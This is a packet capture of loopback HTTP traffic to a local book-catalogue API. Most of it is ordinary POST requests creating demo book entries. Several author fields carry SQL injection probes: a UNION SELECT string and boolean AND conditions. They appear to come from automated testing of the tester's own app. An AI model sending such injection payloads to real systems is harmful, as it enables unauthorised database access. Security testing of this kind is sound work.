22:16:01.316741 IP6 (hlim 64, next-header TCP (6) payload length: 249) ::1.55478 > ::1.8080: Flags [P.], cksum 0x0101 (incorrect -> 0xdd33), seq 1:218, ack 1, win 342, options [nop,nop,TS val 9581580 ecr 9581580], length 217: HTTP, length: 217
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 82
	
	{"name":"Hackathon-Demo8","author":"Ramesh UNION ALL SELECT NULL#","price":"9.99"}[!http]
22:16:01.316785 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55478: Flags [.], cksum 0x0028 (incorrect -> 0xb86d), seq 1, ack 218, win 350, options [nop,nop,TS val 9581580 ecr 9581580], length 0
22:16:01.318225 IP6 (hlim 64, next-header TCP (6) payload length: 255) ::1.8080 > ::1.55478: Flags [P.], cksum 0x0107 (incorrect -> 0xe210), seq 1:224, ack 218, win 350, options [nop,nop,TS val 9581582 ecr 9581580], length 223: HTTP, length: 223
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 22:16:01 GMT
	
	59
	{"id":134,"name":"Hackathon-Demo8","author":"Ramesh UNION ALL SELECT NULL#","price":9.99}
22:16:01.318245 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55478 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xb78a), seq 218, ack 224, win 350, options [nop,nop,TS val 9581582 ecr 9581582], length 0
22:16:01.318439 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.55478: Flags [P.], cksum 0x002d (incorrect -> 0x7363), seq 224:229, ack 218, win 350, options [nop,nop,TS val 9581582 ecr 9581582], length 5: HTTP
22:16:01.318456 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55478 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xb785), seq 218, ack 229, win 350, options [nop,nop,TS val 9581582 ecr 9581582], length 0
22:16:01.318611 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55478 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xb784), seq 218, ack 229, win 350, options [nop,nop,TS val 9581582 ecr 9581582], length 0
22:16:01.318776 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55478: Flags [F.], cksum 0x0028 (incorrect -> 0xb783), seq 229, ack 219, win 350, options [nop,nop,TS val 9581582 ecr 9581582], length 0
22:16:01.318794 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55478 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xb783), seq 219, ack 230, win 350, options [nop,nop,TS val 9581582 ecr 9581582], length 0
22:16:01.327323 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.55480 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x6ad1), seq 1740219334, win 43690, options [mss 65476,sackOK,TS val 9581591 ecr 0,nop,wscale 7], length 0
22:16:01.327359 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.55480: Flags [S.], cksum 0x0030 (incorrect -> 0xd5f8), seq 789917961, ack 1740219335, win 43690, options [mss 65476,sackOK,TS val 9581591 ecr 9581591,nop,wscale 7], length 0
22:16:01.327392 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55480 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xa82a), seq 1, ack 1, win 342, options [nop,nop,TS val 9581591 ecr 9581591], length 0
22:16:01.327526 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.55480 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0xa3d7), seq 1:197, ack 1, win 342, options [nop,nop,TS val 9581591 ecr 9581591], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo9","author":"Ramesh-P","price":"9.99"}[!http]
22:16:01.327550 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55480: Flags [.], cksum 0x0028 (incorrect -> 0xa75e), seq 1, ack 197, win 350, options [nop,nop,TS val 9581591 ecr 9581591], length 0
22:16:01.329929 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.55480: Flags [P.], cksum 0x00f2 (incorrect -> 0xbab8), seq 1:203, ack 197, win 350, options [nop,nop,TS val 9581594 ecr 9581591], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 22:16:01 GMT
	
	44
	{"id":135,"name":"Hackathon-Demo9","author":"Ramesh-P","price":9.99}
22:16:01.329945 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55480 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xa68e), seq 197, ack 203, win 350, options [nop,nop,TS val 9581594 ecr 9581594], length 0
22:16:01.330164 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.55480: Flags [P.], cksum 0x002d (incorrect -> 0x6267), seq 203:208, ack 197, win 350, options [nop,nop,TS val 9581594 ecr 9581594], length 5: HTTP
22:16:01.330179 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55480 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xa689), seq 197, ack 208, win 350, options [nop,nop,TS val 9581594 ecr 9581594], length 0
22:16:01.330482 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55480 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xa688), seq 197, ack 208, win 350, options [nop,nop,TS val 9581594 ecr 9581594], length 0
22:16:01.331804 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55480: Flags [F.], cksum 0x0028 (incorrect -> 0xa686), seq 208, ack 198, win 350, options [nop,nop,TS val 9581595 ecr 9581594], length 0
22:16:01.331821 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55480 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xa685), seq 198, ack 209, win 350, options [nop,nop,TS val 9581595 ecr 9581595], length 0
22:16:01.351401 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.55482 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x5f93), seq 1270270701, win 43690, options [mss 65476,sackOK,TS val 9581615 ecr 0,nop,wscale 7], length 0
22:16:01.351422 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.55482: Flags [S.], cksum 0x0030 (incorrect -> 0x2e4b), seq 1787924964, ack 1270270702, win 43690, options [mss 65476,sackOK,TS val 9581615 ecr 9581615,nop,wscale 7], length 0
22:16:01.351435 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55482 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x007d), seq 1, ack 1, win 342, options [nop,nop,TS val 9581615 ecr 9581615], length 0
22:16:01.351522 IP6 (hlim 64, next-header TCP (6) payload length: 260) ::1.55482 > ::1.8080: Flags [P.], cksum 0x010c (incorrect -> 0x41df), seq 1:229, ack 1, win 342, options [nop,nop,TS val 9581615 ecr 9581615], length 228: HTTP, length: 228
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 93
	
	{"name":"Hackathon-Demo10","author":"Ramesh %"))) AND 1868=7345 AND ((("%"="","price":"9.99"}[!http]
22:16:01.351535 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55482: Flags [.], cksum 0x0028 (incorrect -> 0xff90), seq 1, ack 229, win 350, options [nop,nop,TS val 9581615 ecr 9581615], length 0
22:16:01.353230 IP6 (hlim 64, next-header TCP (6) payload length: 124) ::1.8080 > ::1.55482: Flags [P.], cksum 0x0084 (incorrect -> 0xb0e7), seq 1:93, ack 229, win 350, options [nop,nop,TS val 9581617 ecr 9581615], length 92: HTTP, length: 92
	HTTP/1.1 400 
	Content-Length: 0
	Date: Thu, 27 Jun 2019 22:16:01 GMT
	Connection: close
	
22:16:01.353250 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55482 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xff38), seq 229, ack 93, win 342, options [nop,nop,TS val 9581617 ecr 9581617], length 0
22:16:01.353340 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55482: Flags [F.], cksum 0x0028 (incorrect -> 0xff2f), seq 93, ack 229, win 350, options [nop,nop,TS val 9581617 ecr 9581617], length 0
22:16:01.353475 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55482 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xff36), seq 229, ack 94, win 342, options [nop,nop,TS val 9581617 ecr 9581617], length 0
22:16:01.353492 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55482: Flags [.], cksum 0x0028 (incorrect -> 0xff2e), seq 94, ack 230, win 350, options [nop,nop,TS val 9581617 ecr 9581617], length 0
22:16:01.362509 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.55484 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x4aea), seq 2691271382, win 43690, options [mss 65476,sackOK,TS val 9581626 ecr 0,nop,wscale 7], length 0
22:16:01.362531 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.55484: Flags [S.], cksum 0x0030 (incorrect -> 0x412c), seq 2700293101, ack 2691271383, win 43690, options [mss 65476,sackOK,TS val 9581626 ecr 9581626,nop,wscale 7], length 0
22:16:01.362549 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55484 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x135e), seq 1, ack 1, win 342, options [nop,nop,TS val 9581626 ecr 9581626], length 0
22:16:01.362631 IP6 (hlim 64, next-header TCP (6) payload length: 229) ::1.55484 > ::1.8080: Flags [P.], cksum 0x00ed (incorrect -> 0x12dc), seq 1:198, ack 1, win 342, options [nop,nop,TS val 9581626 ecr 9581626], length 197: HTTP, length: 197
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 62
	
	{"name":"Hackathon-Demo11","author":"Ramesh-P","price":"9.99"}[!http]
22:16:01.362646 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55484: Flags [.], cksum 0x0028 (incorrect -> 0x1291), seq 1, ack 198, win 350, options [nop,nop,TS val 9581626 ecr 9581626], length 0
22:16:01.365250 IP6 (hlim 64, next-header TCP (6) payload length: 235) ::1.8080 > ::1.55484: Flags [P.], cksum 0x00f3 (incorrect -> 0x16ce), seq 1:204, ack 198, win 350, options [nop,nop,TS val 9581629 ecr 9581626], length 203: HTTP, length: 203
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 22:16:01 GMT
	
	45
	{"id":136,"name":"Hackathon-Demo11","author":"Ramesh-P","price":9.99}
22:16:01.365268 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55484 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x11c0), seq 198, ack 204, win 350, options [nop,nop,TS val 9581629 ecr 9581629], length 0
22:16:01.365494 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.55484: Flags [P.], cksum 0x002d (incorrect -> 0xcd98), seq 204:209, ack 198, win 350, options [nop,nop,TS val 9581629 ecr 9581629], length 5: HTTP
22:16:01.365509 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55484 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x11bb), seq 198, ack 209, win 350, options [nop,nop,TS val 9581629 ecr 9581629], length 0
22:16:01.365679 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55484 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x11ba), seq 198, ack 209, win 350, options [nop,nop,TS val 9581629 ecr 9581629], length 0
22:16:01.365864 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55484: Flags [F.], cksum 0x0028 (incorrect -> 0x11b9), seq 209, ack 199, win 350, options [nop,nop,TS val 9581629 ecr 9581629], length 0
22:16:01.365881 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55484 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x11b8), seq 199, ack 210, win 350, options [nop,nop,TS val 9581630 ecr 9581629], length 0
22:16:01.375990 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.55486 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xeeaf), seq 1081558771, win 43690, options [mss 65476,sackOK,TS val 9581640 ecr 0,nop,wscale 7], length 0
22:16:01.376012 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.55486: Flags [S.], cksum 0x0030 (incorrect -> 0x6b6e), seq 3369567614, ack 1081558772, win 43690, options [mss 65476,sackOK,TS val 9581640 ecr 9581640,nop,wscale 7], length 0
22:16:01.376029 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55486 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x3da0), seq 1, ack 1, win 342, options [nop,nop,TS val 9581640 ecr 9581640], length 0
22:16:01.376118 IP6 (hlim 64, next-header TCP (6) payload length: 259) ::1.55486 > ::1.8080: Flags [P.], cksum 0x010b (incorrect -> 0x2683), seq 1:228, ack 1, win 342, options [nop,nop,TS val 9581640 ecr 9581640], length 227: HTTP, length: 227
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 92
	
	{"name":"Hackathon-Demo12","author":"Ramesh%"))) AND 3428=3428 AND ((("%"="","price":"9.99"}[!http]
22:16:01.376131 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55486: Flags [.], cksum 0x0028 (incorrect -> 0x3cb5), seq 1, ack 228, win 350, options [nop,nop,TS val 9581640 ecr 9581640], length 0
22:16:01.377807 IP6 (hlim 64, next-header TCP (6) payload length: 124) ::1.8080 > ::1.55486: Flags [P.], cksum 0x0084 (incorrect -> 0xee0c), seq 1:93, ack 228, win 350, options [nop,nop,TS val 9581641 ecr 9581640], length 92: HTTP, length: 92
	HTTP/1.1 400 
	Content-Length: 0
	Date: Thu, 27 Jun 2019 22:16:01 GMT
	Connection: close
	
